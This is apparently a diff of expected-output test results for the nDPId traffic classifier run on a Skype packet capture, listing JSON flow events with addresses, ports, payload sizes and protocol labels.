-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1264,58 +1264,58 @@ 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969705713,"flow_last_seen":1431969723790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969697530,"flow_last_seen":1431969725781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50088,"dst_port":33033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969681060,"flow_last_seen":1431969700978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":454,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 